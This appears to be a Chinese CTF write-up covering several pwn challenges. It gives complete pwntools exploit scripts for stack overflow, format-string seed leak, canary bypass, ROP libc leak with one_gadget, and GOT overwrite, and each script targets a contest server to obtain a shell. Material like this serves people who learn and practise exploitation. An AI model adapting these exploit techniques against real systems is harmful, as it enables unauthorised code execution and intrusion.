
现在转行还来的及吗?
这里特别感谢C1heck0ut师傅,师傅TQL,不嫌弃我菜,我给师傅拖后腿了。
pwn1:数学咋样?
话不多说,看到提示下载pwntools和ubuntu,直接手撕20个加法
得到flag
pwn2:liuzhuang-secret
栈溢出,程序有system(bin_sh)
1 2 3 4 5 6 7 8 9 10 11
| #! /usr/bin/env python
from pwn import * #sh=process('./pwn00') sh=remote('81.69.0.47',1000)
system_addr=0x000000000040079B payload='a'*0x70+'a'*8+p64(system_addr) sh.sendline(payload)
sh.interactive()
|
pwn3:fmt
格式化字符串,首先泄露种子,然后猜对16次getshell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
| #! /usr/bin/env python from pwn import * from ctypes import *
#sh=process('./fmt') sh=remote('81.69.0.47',2222) context.log_level='debug' libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6") bss_addr=0x40409C
payload='%9$s'+'a'*4+p64(bss_addr) sh.recvuntil('\n') sh.sendline(payload)
seed=u64(sh.recv(4).ljust(8,'\x00')) sh.success('seed : ' +hex(seed))
libc.srand(seed)
for i in range(16): sleep(1) sh.sendline(str(libc.rand()))
#gdb.attach(sh) sh.interactive()
|
pwn4:runcode
写个c就好
1 2 3 4 5 6 7 8 9 10
| #include<stdio.h> #include<unistd.h>
int main(int arg, char **args) { char *argv[]={"cat","","/home/ctf/flag", NULL};
char *envp[]={0,NULL}; execve("/bin/cat",argv,envp); }
|
pwn5:baby_canary
俩次输入的机会,第一次覆盖canary最后一个字节来泄露canary,第二次栈溢出跳到后门函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| #! /usr/bin/env python from pwn import *
#sh=process('./baby_canary') sh=remote('81.69.0.47',3333) elf=ELF('./baby_canary') #context.log_level='debug'
bin_sh=0x00000000004008ED system_plt=elf.plt['system'] pop_rdi=0x0000000000400873
sh.recvuntil('may be you know it,plz tell me.\n') payload='a'*0x67+'b'+'a' sh.send(payload) sh.recvuntil('b') canary=u64(sh.recv(8))-0x61 sh.success('canary : ' +hex(canary))
sleep(0.5) payload='a'*0x68+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system_plt) sh.sendline(payload)
sh.interactive()
|
pwn6:pwn111
ROP利用,简单题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
| #! /usr/bin/env python from pwn import *
#sh=process('./pwn111') sh=remote('81.69.0.47',1122) elf=ELF('./pwn111') libc=ELF('./libc') context.log_level='debug'
pop_rdi=0x0000000000401233 pop_rsi_r15=0x0000000000401231 write_plt=elf.plt['write'] write_got=elf.got['write'] main_addr=0x0000000000401146
sh.recvuntil('please input: ') payload='a'*0x80+'a'*8+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main_addr) sh.sendline(payload)
write_addr=u64(sh.recv(6).ljust(8,'\x00')) sh.success('write_addr : ' +hex(write_addr)) libc_base=write_addr-libc.symbols['write'] sh.success('llibc_base : ' +hex(libc_base)) one_gadget=libc_base+0x4527a sh.success('one_gadget : ' +hex(one_gadget))
payload='a'*0x80+'a'*8+p64(one_gadget) sh.sendline(payload)
sh.interactive()
|
pwn7:pwn222
这里还是参考了riChar师傅的wp才弄懂,太菜了。
具体思路就是通过我们找到的这个gadget,修改read_got为write_got,然后泄露write_got,然后再将write_got修改回read_got,之后再跳回_start函数,最后就是one_gadget一把梭了。
1
| add dword ptr [rbp - 0x3d], ebx ; nop ; ret
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
| #! /usr/bin/env python
from pwn import *
#sh=process('./pwn222') sh=remote('81.69.0.47',2212) elf=ELF('./pwn222') libc=ELF('./libc') context.log_level='debug'
read_got=elf.got['read'] read_plt=elf.plt['read'] pop_rbx_rbp_r12_r13_r14_r15_ret=0x000000000040122A pop_rsi_r15_ret=0x0000000000401231 pop_rdi_ret=0x0000000000401233 add_ret=0x000000000040112c
payload='a'*0x28 payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret) payload+=p64(0x60) payload+=p64(read_got+0x3d) payload+=p64(0)*4 payload+=p64(add_ret) payload+=p64(pop_rdi_ret) payload+=p64(0) payload+=p64(pop_rsi_r15_ret) payload+=p64(read_got) payload+=p64(0) payload+=p64(read_plt) payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret) payload+=p64(0xFFFFFFFFFFFFFFA0) payload+=p64(read_got+0x3d) payload+=p64(0)*4 payload+=p64(add_ret) payload+=p64(0x0000000000401060) sh.sendline(payload)
write_addr=u64(sh.recv(8)) sh.success('write_addr : ' +hex(write_addr)) libc_base=write_addr-libc.symbols['write'] one_gadget=libc_base+0x4527a
payload2='a'*0x28+p64(one_gadget) sh.sendline(payload2) sh.interactive()
|